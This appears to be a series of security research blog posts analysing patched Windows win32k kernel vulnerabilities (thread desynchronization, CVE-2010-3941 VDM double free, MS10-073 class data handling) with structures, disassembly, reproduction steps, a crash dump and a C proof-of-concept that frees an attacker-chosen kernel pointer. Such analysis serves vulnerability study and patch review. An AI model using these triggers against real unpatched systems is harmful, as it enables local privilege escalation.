.rdata:BF9F30D8                 dd offset _SfnOUTSTRING@32
.rdata:BF9F30DC                 dd offset _SfnINSTRING@32
.rdata:BF9F30E0                 dd offset _SfnINOUTLPPOINT5@32
.rdata:BF9F31C8 _gapfnMessageCall dd offset _NtUserfnNCDESTROY@28
.rdata:BF9F31CC                 dd offset _NtUserfnNCDESTROY@28
.rdata:BF9F31D0                 dd offset _NtUserfnINLPCREATESTRUCT@28
.rdata:BF9F31D4                 dd offset _NtUserfnINSTRINGNULL@28
.rdata:BF9F31D8                 dd offset _NtUserfnOUTSTRING@28
.rdata:BF9F31DC                 dd offset _NtUserfnINSTRING@28
.rdata:BF9F31E0                 dd offset _NtUserfnINOUTLPPOINT5@28

In sending a WM_CREATE (0x1) message, the sending thread looks up the associated function id in win32k!MessageTable and calls gapfnMessageCall[0x2] = NtUserfnINLPCREATESTRUCT. This function probes and caches the user-mode values before the message is sent off in win32k!xxxInterSendMsgEx, and the receiving thread processes the message in gapfnScSendMessage[0x2] = SfnINLPCREATESTRUCT.
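The pairing of client and server functions by function id can be sketched with two small name tables. The names are copied from the listings above; the helpers client_handler and server_handler are hypothetical and only cover the seven entries shown.

```c
#include <stddef.h>

/* Handler names for function ids 0..6, taken from the two tables above. */
static const char *const server_names[] = {
    "SfnDWORD", "SfnNCDESTROY", "SfnINLPCREATESTRUCT", "SfnINSTRINGNULL",
    "SfnOUTSTRING", "SfnINSTRING", "SfnINOUTLPPOINT5"
};
static const char *const client_names[] = {
    "NtUserfnNCDESTROY", "NtUserfnNCDESTROY", "NtUserfnINLPCREATESTRUCT",
    "NtUserfnINSTRINGNULL", "NtUserfnOUTSTRING", "NtUserfnINSTRING",
    "NtUserfnINOUTLPPOINT5"
};

#define HANDLER_COUNT (sizeof(server_names) / sizeof(server_names[0]))

/* Hypothetical helpers: map a function id to the routine used by the
   sending (client) or receiving (server) thread; NULL if out of range. */
static const char *client_handler(size_t id)
{
    return id < HANDLER_COUNT ? client_names[id] : NULL;
}

static const char *server_handler(size_t id)
{
    return id < HANDLER_COUNT ? server_names[id] : NULL;
}
```

For function id 0x2, the helpers return NtUserfnINLPCREATESTRUCT and SfnINLPCREATESTRUCT, matching the WM_CREATE case above.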

SendMessage/GetMessage Execution Flow

In order for send messages to function as intended, the kernel must implement mechanisms to ensure that the sending and receiving threads are synchronized. This is important as message parameters/variables can be stored on the kernel stack of the sending thread, and updates made to this thread stack must be done in a controlled manner. To ensure that neither thread has unexpectedly terminated, the send message kernel structure employs a flags field to keep track of the state of both threads. For instance, if a thread terminates, win32k!xxxDestroyThreadInfo calls win32k!SendMsgCleanup to update the flags field of the SMS structure accordingly. This field must be checked explicitly before updating any values in the stack of the opposite thread.

Thread Desynchronization Vulnerabilities

Several server functions (win32k!Sfn*) did not properly validate the state of the sender thread (client) before returning data to the sender’s thread stack. Consequently, the receiver thread could write to memory that had been freed or even worse, write to a desynchronized kernel thread stack. The latter could result in arbitrary kernel code execution, for instance in overwriting the return pointer of a stack frame. In win32k!SfnINLPDRAWITEMSTRUCT, we see that the device context value on the client thread stack (ESI) is updated without performing the necessary state checks.

.text:BF93A9FC    mov     edi, [ebp+hdcOriginal]
.text:BF93A9FF    test    edi, edi
.text:BF93AA01    jz      short loc_BF93AA11
.text:BF93AA03    mov     esi, [ebp+pDrawItemStruct]		// client stack
.text:BF93AA06    push    [esi+tagDRAWITEMSTRUCT.hDC]
.text:BF93AA09    call    __ReleaseDC@4   ; _ReleaseDC(x)
.text:BF93AA0E    mov     [esi+tagDRAWITEMSTRUCT.hDC], edi	// restore hDC
.text:BF93AA11    mov     eax, [ebp+var_2C]
.text:BF93AA14    jmp     short loc_BF93AA4C
.text:BF93AA16    xor     eax, eax
.text:BF93AA18    inc     eax
.text:BF93AA19    retn
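The kind of state check that is missing here can be sketched in portable C. This is only a model under stated assumptions: the flag name and value, the structure, and both helpers are hypothetical, as this post does not list the real flag definitions used by win32k.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical state bit; the real flag names and values are not given here. */
#define MODEL_SMF_SENDER_DIED 0x1u

struct model_sms {
    unsigned int flags;       /* state of the sending and receiving threads */
    int *sender_stack_slot;   /* stands in for a pointer into the sender's kernel stack */
};

/* Write a result back to the sender only while the sender is still waiting.
   Returns true if the write was performed. */
static bool return_to_sender(struct model_sms *sms, int value)
{
    if (sms->flags & MODEL_SMF_SENDER_DIED)
        return false;         /* sender is gone: its stack must not be touched */
    *sms->sender_stack_slot = value;
    return true;
}

/* Models the cleanup performed when the sending thread terminates. */
static void sender_terminated(struct model_sms *sms)
{
    sms->flags |= MODEL_SMF_SENDER_DIED;
    sms->sender_stack_slot = NULL;
}
```

A server function that skips the flags test in return_to_sender is the pattern seen in the disassembly above: the write goes through regardless of what has happened to the sender.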

References

  1. Edgar Barbosa – Windows Vista UIPI
  2. mxatone – Analyzing local privilege escalations in win32k
  3. http://msdn.microsoft.com/en-us/library/ms644927(v=vs.85).aspx

Kernel Pool Exploitation on Windows 7

As some of you may already have noticed, I’ll be speaking at Black Hat DC this year. The talk is titled Kernel Pool Exploitation on Windows 7 and covers the inner workings of the Windows 7 kernel pool (data structures, algorithms, etc.) and its susceptibility to exploitation in the face of pool corruption vulnerabilities. As we all know, kernel pool exploitation became measurably more difficult on Windows 7 due to safe unlinking. If you’re interested in kernel/driver vulnerabilities and their exploitability, you should definitely stop by January 19th and follow me (@kernelpool) on Twitter :-) The presentation abstract is as follows.

In Windows 7, Microsoft introduced safe unlinking to the kernel pool to address the growing number of vulnerabilities affecting the Windows kernel. Prior to removing an entry from a doubly-linked list, safe unlinking aims to detect memory corruption by validating the pointers to adjacent list entries. Hence, an attacker cannot easily leverage generic “write 4” techniques in exploiting pool overflows or other pool corruption vulnerabilities. In this talk, we show that in spite of the efforts made to remove generic exploit vectors, Windows 7 is still susceptible to generic kernel pool attacks. In particular, we show that the pool allocator may under certain conditions fail to safely unlink free list entries, thus allowing an attacker to corrupt arbitrary memory. In order to thwart the presented attacks, we conclusively propose ways to further harden and enhance the security of the kernel pool.

Update (2011-02-04): The slides and whitepaper have been made available for download here.
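For readers unfamiliar with the safe unlinking check mentioned in the abstract, here is a minimal sketch of the idea on a plain doubly-linked list. The structure mirrors the flink/blink layout of a list entry, but the function names are assumptions and the code is a user-mode model, not the pool allocator's implementation.

```c
#include <stdbool.h>
#include <stddef.h>

/* Doubly-linked list entry with forward and backward links. */
struct list_entry {
    struct list_entry *flink;   /* next entry */
    struct list_entry *blink;   /* previous entry */
};

static void list_init(struct list_entry *head)
{
    head->flink = head;
    head->blink = head;
}

static void list_insert_tail(struct list_entry *head, struct list_entry *e)
{
    e->flink = head;
    e->blink = head->blink;
    head->blink->flink = e;
    head->blink = e;
}

/* Unlink only if both neighbours still point back at the entry. */
static bool safe_unlink(struct list_entry *e)
{
    if (e->flink->blink != e || e->blink->flink != e)
        return false;           /* corruption detected; a kernel would bugcheck here */
    e->blink->flink = e->flink;
    e->flink->blink = e->blink;
    return true;
}
```

An overflow that replaces flink or blink with attacker-chosen addresses fails the comparison, which is why the generic write primitive no longer works whenever the check is actually performed.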

CVE-2010-3941: Windows VDM Task Initialization Vulnerability

In MS10-098, Microsoft patched multiple vulnerabilities reported in win32k.sys that could be leveraged by a non-privileged user to gain elevated rights on a vulnerable system. One of the vulnerabilities affected the win32k component of the WOW32 subsystem, which plays an integral role in managing and scheduling tasks (i.e. Win16 applications) in the Virtual DOS Machine (VDM). As VDM bugs historically have been of interest [1][2] to the security community, I wanted to spend some time explaining the details of this particular vulnerability.

WOW Subsystem

MS-DOS and 16-bit Windows applications are not natively supported by their own environment subsystems running in separate user-mode processes. Instead, they are supported by Virtual DOS Machines (VDM) that provide an execution environment that resembles native MS-DOS. The lowest 16 MB of the VDM uses 16-bit segmented addressing to access memory, and contains MS-DOS emulation code as well as MS-DOS applications. The upper areas of the VDM use 32-bit addressing, and are used to provide Win32 and Windows NT executive services normally provided by MS-DOS itself.

The VDM used to run Win16 applications contains an extra layer of software called the Win16 on Win32 (WOW) layer. When an application calls a Win16 function, the WOW layer intercepts the call and passes control to the equivalent Win32 function. A single VDM is shared by all Win16 applications to emulate the native Windows 3.1 environment in which all applications share the same address space. This also allows the WOW layer to mimic the non-preemptive multitasking environment expected by Win16 applications. Although each Win16 application is granted its own thread, the WOW layer ensures that only one Win16 application’s thread is active at any given time. [3]

WOW Structures

In order to properly emulate the Windows 3.1 execution environment, threads and processes define their own dedicated WOW kernel structures. When starting a new Win16 application, CSRSS invokes the NtUserNotifyProcessCreate system call to create a WOW per thread information structure (win32k!tagWOWTHREADINFO) for the new task.

typedef struct _tagWOWTHREADINFO        // 5 elements, 0x14 bytes (sizeof)
{
/*0x000*/     struct _tagWOWTHREADINFO* pwtiNext;
/*0x004*/     ULONG32      idTask;
/*0x008*/     ULONG32      idWaitObject;
/*0x00C*/     ULONG32      idParentProcess;
/*0x010*/     struct _KEVENT* pIdleEvent;
} tagWOWTHREADINFO, *PtagWOWTHREADINFO;

Notably, the WOWTHREADINFO structure defines a pointer to the idle event object (pIdleEvent), used in WOW task synchronization, as well as a unique id (idTask) specific to each task in a VDM. The task id is also stored at offset 0x18 in an undocumented thread data structure pointed to by NtCurrentTeb()->WOW32Reserved. As the WOWTHREADINFO structure is created upon process creation, it is actually initialized before the thread object itself is set up.

When a VDM first starts up and is initialized in WOW32!W32Init, it additionally calls WOW32!WK32InitializeHungAppSupport to allocate and initialize a per process WOW information structure (win32k!tagWOWPROCESSINFO).

typedef struct _tagWOWPROCESSINFO          // 10 elements, 0x28 bytes (sizeof)
{
/*0x000*/     struct _tagWOWPROCESSINFO* pwpiNext;
/*0x004*/     struct _tagTHREADINFO* ptiScheduled;
/*0x008*/     struct _tagTDB* ptdbHead;
/*0x00C*/     VOID*        lpfnWowExitTask;
/*0x010*/     struct _KEVENT* pEventWowExec;
/*0x014*/     VOID*        hEventWowExecClient;
/*0x018*/     ULONG32      nSendLock;
/*0x01C*/     ULONG32      nRecvLock;
/*0x020*/     struct _tagTHREADINFO* CSOwningThread;
/*0x024*/     LONG32       CSLockCount;
} tagWOWPROCESSINFO, *PtagWOWPROCESSINFO;

The WOWPROCESSINFO structure is global to all tasks running in a VDM in the same way that a PROCESSINFO structure is global to all GUI threads running in a process. It holds information such as the currently scheduled task (ptiScheduled) and the list of WOW tasks (ptdbHead), sorted by priority. Each entry in the task list is represented by a task data block structure (win32k!tagTDB), shown below.

typedef struct _tagTDB              // 7 elements, 0x18 bytes (sizeof)
{
/*0x000*/     struct _tagTDB* ptdbNext;
/*0x004*/     INT32        nEvents;
/*0x008*/     INT32        nPriority;
/*0x00C*/     struct _tagTHREADINFO* pti;
/*0x010*/     struct _tagWOWTHREADINFO* pwti;
/*0x014*/     UINT16       hTaskWow;
/*0x016*/     UINT16       TDB_Flags;
} tagTDB, *PtagTDB;

The TDB is created in NtUserInitTask when a VDM calls WOW32!WK32WOWInitTask to initialize a new task. It sets the task priority (nPriority) and links the task to the WOW per-thread information structure (pwti), as well as the regular per-thread information structure (pti). The task data block structure also keeps track of pending events (nEvents), used when scheduling tasks within a VDM.
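As a rough illustration of a task list kept sorted by priority, the sketch below inserts a reduced task entry into a singly-linked list. The ordering direction (highest priority first) is an assumption, as are the type and function names; only the link and priority fields of the TDB are modeled.

```c
#include <stddef.h>

/* Reduced model of a task data block: only the link and the priority. */
struct model_tdb {
    struct model_tdb *next;
    int priority;
};

/* Insert tdb so that the list stays ordered, highest priority first
   (assumed ordering). Entries with equal priority keep insertion order. */
static void insert_task(struct model_tdb **head, struct model_tdb *tdb)
{
    struct model_tdb **pp = head;

    while (*pp != NULL && (*pp)->priority >= tdb->priority)
        pp = &(*pp)->next;

    tdb->next = *pp;
    *pp = tdb;
}
```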

[Figure: Relationships between WOW kernel structures]

Task Initialization Vulnerability

In initializing a new task via NtUserInitTask within the context of a shared VDM, zzzInitTask attempts to associate the already created WOWTHREADINFO structure with the task data block structure of the new task. However, the function fails to check if the specified task id (provided in the eighth argument to NtUserInitTask) has already been initialized. Thus, in initializing a task with an id of an already initialized task, the WOW per-thread information structure is assigned to a second task. Consequently, destroying either task referencing this particular structure would cause the other task to reference freed memory. When in turn the other task is destroyed, a double free occurs. As an attacker could easily reallocate the freed memory after having destroyed the first task, the vulnerability could be leveraged to escalate privileges (e.g. by freeing an in-use object or by exploiting the kernel pool).
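The missing check can be modeled in a few lines of portable C. This is a simplified sketch, not the win32k code: the structures, the fixed-size task table, and both functions are hypothetical, and the checked variant shows one plausible validation rather than what the patch necessarily does.

```c
#include <stdbool.h>
#include <stddef.h>

#define MAX_TASKS 4

struct wow_thread_info { unsigned int id_task; };   /* stands in for WOWTHREADINFO */

struct wow_task {                                   /* stands in for the TDB */
    struct wow_thread_info *pwti;
    bool used;
};

static struct wow_task tasks[MAX_TASKS];

/* Vulnerable pattern: binds wti to a new task without checking whether
   another task already references it. */
static struct wow_task *init_task_unchecked(struct wow_thread_info *wti)
{
    for (size_t i = 0; i < MAX_TASKS; i++) {
        if (!tasks[i].used) {
            tasks[i].used = true;
            tasks[i].pwti = wti;
            return &tasks[i];
        }
    }
    return NULL;
}

/* Checked variant (hypothetical): refuses a wti that is already bound. */
static struct wow_task *init_task_checked(struct wow_thread_info *wti)
{
    for (size_t i = 0; i < MAX_TASKS; i++) {
        if (tasks[i].used && tasks[i].pwti == wti)
            return NULL;
    }
    return init_task_unchecked(wti);
}
```

Calling init_task_unchecked twice with the same structure leaves two tasks pointing at one allocation, so tearing down both tasks frees it twice.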

In short, the following steps can be taken to reproduce the vulnerability.

  1. Start a 16-bit Windows application
  2. Enumerate the task ids of NTVDM’s threads by inspecting TEB->WOW32Reserved
  3. Call NtUserInitTask from the NTVDM process and specify the task id of an existing task/thread
  4. Terminate the process

A bugcheck such as the one below should be triggered.

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

BAD_POOL_CALLER (c2)
The current thread is making a bad pool request.  Typically this is at a bad IRQL level or double freeing the same allocation, etc.
Arguments:
Arg1: 00000007, Attempt to free pool which was already freed
Arg2: 00001097, (reserved)
Arg3: 5a040063, Memory contents of the pool block
Arg4: ffa9e320, Address of the block of pool being deallocated

Debugging Details:
------------------

POOL_ADDRESS:  ffa9e320 Paged session pool

FREED_POOL_TAG:  Uswt

BUGCHECK_STR:  0xc2_7_Uswt

DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT

PROCESS_NAME:  ntvdm.exe

CURRENT_IRQL:  2

LAST_CONTROL_TRANSFER:  from 828e9e71 to 82878394

STACK_TEXT:
96877734 828e9e71 00000003 73526f7a 00000065 nt!RtlpBreakWithStatusInstruction
96877784 828ea96d 00000003 ffa9e318 000001ff nt!KiBugCheckDebugBreak+0x1c
96877b48 8292c1b6 000000c2 00000007 00001097 nt!KeBugCheck2+0x68b
96877bc4 92e7db18 ffa9e320 00000000 00000000 nt!ExFreePoolWithTag+0x1b1
96877be0 92defd09 ffa98a08 fe59fdd8 04751a78 win32k!DestroyTask+0xa1
96877c30 92decf87 895e6158 895e6158 00000000 win32k!xxxDestroyThreadInfo+0x5b5
96877c44 92deeaa6 895e6158 00000001 895e6158 win32k!UserThreadCallout+0x77
96877c60 82a55af4 895e6158 00000001 73526422 win32k!W32pThreadCallout+0x3a
96877cdc 82a8350e 00000000 00000000 895e6158 nt!PspExitThread+0x455
96877cfc 82a81958 895e6158 00000000 00000001 nt!PspTerminateThreadByPointer+0x61
96877d24 8285042a 00000000 00000000 0287f2ac nt!NtTerminateThread+0x74
96877d24 77a564f4 00000000 00000000 0287f2ac nt!KiFastCallEntry+0x12a
0287f290 77a55d2c 77a40892 00000000 00000000 ntdll!KiFastSystemCallRet
0287f294 77a40892 00000000 00000000 0287f364 ntdll!NtTerminateThread+0xc
0287f2ac 0e08d2d8 00000000 0287f308 6f1bb442 ntdll!RtlExitUserThread+0x39
0287f2b8 6f1bb442 00000000 6f1a718d e68f4f42 ntvdm!host_ExitThread+0x13
0287f2c0 6f1a718d e68f4f42 00000200 010ec288 WOW32!WK32WOWKillTask+0x28
0287f308 0e0a23ad 0e0a32ce 80000000 00002bf4 WOW32!W32Dispatch+0xb4
0287f30c 0e0a32ce 80000000 00002bf4 00000000 ntvdm!EventVdmBop+0x29
0287f324 6f1bb3d7 16c729e8 6f1badc6 010e0f10 ntvdm!cpu_simulate+0x186
0287fb74 0e08d29d 16c729e8 e53c55e4 00000000 WOW32!W32Thread+0x611
0287fbb4 77211174 010e0f10 0287fc00 77a6b3f5 ntvdm!ThreadStartupRoutine+0x2c
0287fbc0 77a6b3f5 010e0f10 7528fc69 00000000 kernel32!BaseThreadInitThunk+0xe
0287fc00 77a6b3c8 0e08d271 010e0f10 00000000 ntdll!__RtlUserThreadStart+0x70
0287fc18 00000000 0e08d271 010e0f10 00000000 ntdll!_RtlUserThreadStart+0x1b

STACK_COMMAND:  kb

FOLLOWUP_IP:
win32k!DestroyTask+a1
92e7db18 a1fcc1f392      mov     eax,dword ptr [win32k!gpsi (92f3c1fc)]

SYMBOL_STACK_INDEX:  4

SYMBOL_NAME:  win32k!DestroyTask+a1

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: win32k

IMAGE_NAME:  win32k.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  4a5bc2a2

FAILURE_BUCKET_ID:  0xc2_7_Uswt_win32k!DestroyTask+a1

BUCKET_ID:  0xc2_7_Uswt_win32k!DestroyTask+a1

Followup: MachineOwner
---------

References

  1. Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
  2. Windows VDM Zero Page Race Condition Privilege Escalation
  3. http://technet.microsoft.com/en-us/library/cc767884.aspx

MS10-073: Windows Class Handling Gone Wrong

In MS10-073, Microsoft addressed a privilege escalation vulnerability (CVE-2010-2744) in window class data handling, affecting all supported versions of Windows. In this blog post, we will examine the details of the vulnerability as well as the changes made by the patch. Note that this vulnerability differs from the EoP used by Stuxnet on XP/2000, also addressed in MS10-073.

Windows User Objects

Windows manages all user interface entities such as windows, menus, and cursors as objects. In fact, win32k has its own dedicated handle table for keeping track of all active user objects in a given session. One of the most important objects is undeniably the window object. On Windows 7, win32k.sys conveniently exports symbol information for the window object structure (win32k!tagWND), shown below.

typedef struct tagWND
{
/*0x000*/     struct _THRDESKHEAD head;
/*0x014*/     ULONG32      state;
/*0x018*/     ULONG32      state2;
/*0x01C*/     ULONG32      ExStyle;
/*0x020*/     ULONG32      style;
/*0x024*/     VOID*        hModule;
/*0x028*/     UINT16       hMod16;
/*0x02A*/     UINT16       fnid;
/*0x02C*/     struct _tagWND* spwndNext;
/*0x030*/     struct _tagWND* spwndPrev;
/*0x034*/     struct _tagWND* spwndParent;
/*0x038*/     struct _tagWND* spwndChild;
/*0x03C*/     struct _tagWND* spwndOwner;
/*0x040*/     struct _tagRECT rcWindow;
/*0x050*/     struct _tagRECT rcClient;
/*0x060*/     PVOID lpfnWndProc;
/*0x064*/     struct _tagCLS* pcls;
/*0x068*/     struct _HRGN__* hrgnUpdate;
/*0x06C*/     struct _tagPROPLIST* ppropList;
/*0x070*/     struct _tagSBINFO* pSBInfo;
/*0x074*/     struct _tagMENU* spmenuSys;
/*0x078*/     struct _tagMENU* spmenu;
/*0x07C*/     struct _HRGN__* hrgnClip;
/*0x080*/     struct _HRGN__* hrgnNewFrame;
/*0x084*/     struct _LARGE_UNICODE_STRING strName;
/*0x090*/     INT32        cbwndExtra;
/*0x094*/     struct _tagWND* spwndLastActive;
/*0x098*/     struct _HIMC__* hImc;
/*0x09C*/     ULONG32      dwUserData;
/*0x0A0*/     struct _ACTIVATION_CONTEXT* pActCtx;
/*0x0A4*/     struct _D3DMATRIX* pTransform;
/*0x0A8*/     struct _tagWND* spwndClipboardListenerNext;
/*0x0AC*/     ULONG32      ExStyle2;
} WND, *PWND;

In our case, there are a few fields we want to pay closer attention to. The FNID, stored at offset 0x2A, is a constant defining the function identifier of the associated class. The FNID can be used to call any system class window procedure via NtUserMessageCall, and is also frequently used by Windows to determine if a system class window has been properly initialized (set to non-null). Also of interest is the class object pointer (pcls), stored at offset 0x64. The class defines common window attributes as well as the number of extra bytes reserved for each window (mirrored in cbwndExtra at offset 0x90). This data immediately follows a window object in memory and can be application defined or used by a system class window for class-specific data.

In order to update the extra data associated with each window, an application may call SetWindowLongPtr with nIndex set to a zero-based offset. As system class windows also store kernel pointers in the extra window memory, validation has to be performed before an operation is permitted. In particular, xxxSetWindowLong (called by NtUserSetWindowLong, for instance) checks the window FNID in order to prevent malicious attempts at updating data used by the kernel. The problem with this approach is that the FNID starts out as null, and hence may allow an attacker to pre-initialize extra data (e.g. via SetWindowLongPtr) before a system class window has been properly initialized. Although this normally shouldn’t be a problem, two system class procedures were found to incorrectly handle already initialized extra window data, leading to exploitable conditions.
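The weakness of a check based on the FNID alone can be shown with a small model. The structure and function below are hypothetical stand-ins for the window object and the validation in xxxSetWindowLong, reduced to the one condition discussed above.

```c
#include <stdbool.h>
#include <stdint.h>

/* Reduced window model: the function identifier and one pointer-sized
   slot of extra window memory. */
struct model_wnd {
    uint16_t  fnid;    /* 0 until a system class procedure initializes the window */
    uintptr_t extra;
};

/* Models an FNID-only check: writes are refused once the window is a
   system class window, but allowed while fnid is still 0. */
static bool set_extra(struct model_wnd *wnd, uintptr_t value)
{
    if (wnd->fnid != 0)
        return false;
    wnd->extra = value;
    return true;
}
```

Since every window starts with an FNID of 0, the write succeeds as long as it happens before the system class procedure has run.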

Window Class Handling Vulnerabilities

The menu window system class procedure (xxxMenuWindowProc) is responsible for handling messages sent to menu windows. Upon receiving a WM_NCCREATE message, the menu window attempts to allocate and initialize a popup menu structure (win32k!tagPOPUPMENU), for which it stores a pointer in the extra window memory. However, if this pointer has already been initialized before the WM_NCCREATE message has been sent, the menu window procedure would use the existing pointer instead. As this pointer could have been set manually via SetWindowLongPtr (before the FNID is assigned), an attacker could fully control the popup menu structure, used in subsequent read and write operations. Moreover, destroying the window would result in the attacker controlled pointer being freed. The latter is demonstrated in the following test case.

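#include <windows.h>

// MenuWindowProcA is an undocumented USER32 export; this prototype is
// inferred from the five-argument call below.
typedef LRESULT (WINAPI *MENUWINDOWPROCA)(HWND, ULONG_PTR, UINT, WPARAM, LPARAM);

int main(int argc, char **argv)
{
	WNDCLASSA Class = {0};
	CREATESTRUCTA Cs = {0};
	MENUWINDOWPROCA MenuWindowProcA;
	HMODULE hModule;
	HWND hWindow;

	Class.lpfnWndProc = DefWindowProcA;
	Class.lpszClassName = "Class";
	Class.cbWndExtra = sizeof(PVOID);	// room for one pointer of extra window data

	if (!RegisterClassA(&Class))
		return 1;

	hModule = LoadLibraryA("USER32.DLL");
	if (hModule == NULL)
		return 1;

	MenuWindowProcA = (MENUWINDOWPROCA)GetProcAddress(hModule,"MenuWindowProcA");
	if (MenuWindowProcA == NULL)
		return 1;

	hWindow = CreateWindowA("Class","Window",0,0,0,32,32,NULL,NULL,NULL,NULL);
	if (hWindow == NULL)
		return 1;

	// set the pointer value of the (soon to be) popup menu structure
	SetWindowLongPtrA(hWindow,0,(LONG_PTR)0x80808080);

	// set WND->fnid = FNID_MENU
	MenuWindowProcA(hWindow,0,WM_NCCREATE,(WPARAM)0,(LPARAM)&Cs);

	// trigger -> kernel pool free of 0x80808080
	DestroyWindow(hWindow);

	return 0;
}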

The task switch window procedure (xxxSwitchWndProc) was found vulnerable to a similar error. In processing the WM_CREATE message, the procedure failed to validate the switch window information pointer that possibly could have been pre-initialized. Consequently, any further operations involving the use of this pointer could lead to an arbitrary read or write. This flaw only appeared to have exploitable impact on XP/2003, as Vista and later verify the pointers (in win32k!RemoveSwitchWindowInfo) by traversing a linked list of all active SwitchWindowInfo structures (win32k!gpswiFirst).

The Patch

In order to address the vulnerabilities, changes were made to the SetWindowLong APIs as well as the system class procedures. Notably, several functions now perform additional validation on the associated window class (and not just the FNID) before attempting to update extra window data. Additionally, both xxxMenuWindowProc and xxxSwitchWndProc now ensure that the extra data is null before handling the window object (and updating the FNID). This is needed as the system class pointer in a window object is never actually updated upon “converting” to a system class in the test case above. Thus, the changes made to xxxSetWindowLong would not alone be sufficient to prevent pre-initialization of window system class data.
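The difference between the old and new behavior of the system class procedures can be sketched as follows. This is a user-mode model under stated assumptions: the structure, the placeholder FNID value, and both functions are hypothetical and only capture the null check on the extra data described above.

```c
#include <stdbool.h>
#include <stdint.h>

#define MODEL_FNID_MENU 1u   /* placeholder, not the real FNID_MENU constant */

struct model_wnd {
    uint16_t  fnid;
    uintptr_t extra;         /* slot holding the popup menu pointer */
};

/* Pre-patch behaviour as described: an already populated slot is trusted. */
static bool menu_create_unpatched(struct model_wnd *wnd, uintptr_t new_popup)
{
    if (wnd->extra == 0)
        wnd->extra = new_popup;
    wnd->fnid = MODEL_FNID_MENU;
    return true;
}

/* Post-patch behaviour as described: pre-initialized extra data is
   rejected before the FNID is updated. */
static bool menu_create_patched(struct model_wnd *wnd, uintptr_t new_popup)
{
    if (wnd->extra != 0)
        return false;
    wnd->extra = new_popup;
    wnd->fnid = MODEL_FNID_MENU;
    return true;
}
```

In the patched model, a window whose slot was filled in beforehand never becomes a menu window, so the planted pointer is never used or freed by the menu code.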